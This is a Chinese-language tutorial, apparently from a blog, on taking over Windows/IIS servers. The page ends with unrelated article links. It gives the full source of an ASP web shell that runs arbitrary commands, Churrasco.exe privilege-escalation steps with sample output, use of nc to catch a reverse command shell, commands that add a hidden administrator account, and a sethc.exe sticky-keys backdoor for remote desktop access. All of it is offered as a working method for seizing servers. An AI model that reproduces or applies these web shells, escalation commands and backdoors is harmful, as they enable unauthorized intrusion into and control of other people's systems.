提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="net user"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="C:\RECYCLER\cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

/churrasco/-->Getting Rpcss PID ...

/churrasco/-->Found Rpcss PID: 696

/churrasco/-->Searching for Rpcss threads ...

/churrasco/-->Found Thread: 444

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 700

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 704

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 712

/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/-->Getting SYSTEM token from Rpcss Service...

/churrasco/-->Found szywjs Token

/churrasco/-->Found SYSTEM token 0xf1c

/churrasco/-->Running command with SYSTEM Token...

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe "net localgroup
administrators iisuser /add"
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe
c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\explorer.exe d:\windows\system32\sethc.exe"
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

SHIFT后门拿服务器之方法总结的更多相关文章

  1. linux下维护服务器之常用命令

    linux下维护服务器之常用命令! 第1套如下: 正则表达式: 1.如何不要文件中的空白行和注释语句: [root@localhost ~]# grep -v '^$' 文件名 |grep -v '^ ...

  2. backup服务器之rsync服务

    backup服务器之rsync服务   rsync是开源的.快速的.多功能的可实现全量及增量的本地或远程数据同步备份的优秀工具.它拥有scp.cp的全量复制功能,同时比scp.cp命令更优秀.更强大. ...

  3. 实现jquery.ajax及原生的XMLHttpRequest跨域调用WCF服务的方法

    关于ajax跨域调用WCF服务的方法很多,经过我反复的代码测试,认为如下方法是最为简便的,当然也不能说别人的方法是错误的,下面就来上代码,WCF服务定义还是延用上次的,如: namespace Wcf ...

  4. 实现jquery.ajax及原生的XMLHttpRequest调用WCF服务的方法

    废话不多说,直接讲解实现步骤 一.首先我们需定义支持WEB HTTP方法调用的WCF服务契约及实现服务契约类(重点关注各attribute),代码如下: //IAddService.cs namesp ...

  5. Web服务器之iis,apache,tomcat三者之间的比较

    IIS-Apache-Tomcat的区别 IIS与Tomcat的区别 IIS是微软公司的Web服务器.主要支持ASP语言环境. Tomcat是Java Servlet 2.2和JavaServer P ...

  6. WebService服务调用方法介绍

    1 背景概述 由于在项目中需要多次调用webservice服务,本文主要总结了一下java调用WebService常见的6种方式,即:四种框架的五种调用方法以及使用AEAI ESB进行调用的方法. 2 ...

  7. linux服务器之LVS、Nginx和HAProxy负载均衡器对比

    linux服务器之LVS.Nginx和HAProxy负载均衡器对比. LVS特点:  1.抗负载能力强,使用IP负载均衡技术,只做分发,所以LVS本身并没有多少流量产生:  2.稳定性.可靠性好,自身 ...

  8. Windows Server 2003开机自动启动MySQL服务设置方法

    Windows Server 2003开机自动启动MySQL服务设置方法 发布时间:2014-12-19 更新时间:2014-12-24 来源:网络 作者:eaglezhong 关键词: 2003 e ...

  9. 【转】Android 服务器之SFTP服务器上传下载功能

    原文网址:http://blog.csdn.net/tanghua0809/article/details/47056327 本文主要是讲解Android服务器之SFTP服务器的上传下载功能,也是对之 ...

随机推荐

  1. 725C

    找出连通块,然后找出颜色最大的,用总数减去 #include<iostream>#include<map>#include<cstring>#include< ...

  2. 关于selenium 3.0 + python 3.5中多层框架或窗口的定位driver.switch_to_frame()

    针对selenium3 中的窗口定位会自动划掉,不起作用 现在换成 driver.switch_to.frame()就会不报错了

  3. jQyery实现轮播器

    看到各大网站上都有一个轮播器的效果,自己不禁也想做一个,查了资料,看了轮播器的原理,慢慢的试着做了做,最终效果勉勉强强 原理:如图,试想一下,若是将<ul>的width属性值设置的很宽,直 ...

  4. sax 解析 xml

    SAX(Simple API for XML) https://docs.oracle.com/javase/tutorial/jaxp/sax/parsing.html persons.xml &l ...

  5. C#中的斜变性和逆变性的详解

    1,问题 大家可以看到定义泛型类型的可以看到out和in这两个关键字,那么具体代表什么意思呢? 2,文字解释 C# 4.0通过两个关键字:out和in来分别支持以协变和逆变的方式使用泛型. 如果某个返 ...

  6. libusb-win32简介~

    libusb-win32简介 libusb-win32 is a port of the USB library libusb (http://sf.net/projects/libusb/) to ...

  7. 全栈必备 Linux 基础

    Linux 几乎无处不在,不论是服务器构建,还是客户端开发,操作系统的基础技能对全栈来说都是必备的.系统的选择Linux发行版本可以大体分为两类,一类是商业公司维护的发行版本,一类是社区组织维护的发行 ...

  8. Js里面的强制类型转换

    js 和 PHP语言一样是弱类型语言.近期我也在看C语言,并没有传说中那么难,既是书中一再强调的指针部分,也没有那么夸张.至少是理论和语法理解起来不是很难.看起来凡是什么东西,不要总是被别人的话迷惑了 ...

  9. IAR Usage

    ctrl+shift+f: 全局搜索

  10. python 遍历文件夹 文件

    python 遍历文件夹 文件   import os import os.path rootdir = "d:\data" # 指明被遍历的文件夹 for parent,dirn ...